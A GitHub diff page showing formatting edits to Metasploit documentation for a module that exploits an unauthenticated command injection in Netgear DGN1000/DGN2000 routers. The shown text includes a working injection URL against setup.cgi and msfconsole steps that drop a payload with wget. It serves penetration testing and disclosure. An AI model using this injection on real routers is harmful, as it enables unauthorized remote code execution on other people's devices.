You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md
+7-4Lines changed: 7 additions & 4 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -1,4 +1,4 @@
1
-
The module netgear_dgn1000_setup_unauth_exec module exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/¤tsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.
1
+
The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/¤tsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.
2
2
3
3
## Vulnerable Application
4
4
@@ -8,16 +8,17 @@ Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models
8
8
9
9
1. Start msfconsole
10
10
2. Do : `use exploit/linux/http/netgear_dgn1000_setup_unauth_exec`
11
-
3. Do : `set RHOST <RouterIP>`
12
-
4. Do : `set PAYLOAD <payload>`
11
+
3. Do : `set RHOST [RouterIP]`
12
+
4. Do : `set PAYLOAD [payload]`
13
13
5. Do : `run`
14
14
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
15
15
16
16
## Scenarious
17
17
18
18
Sample output of a successfull exploitation should be look like this :
19
19
20
-
```msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
20
+
```
21
+
msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
21
22
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1
22
23
RHOST => 192.168.0.1
23
24
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80
0 commit comments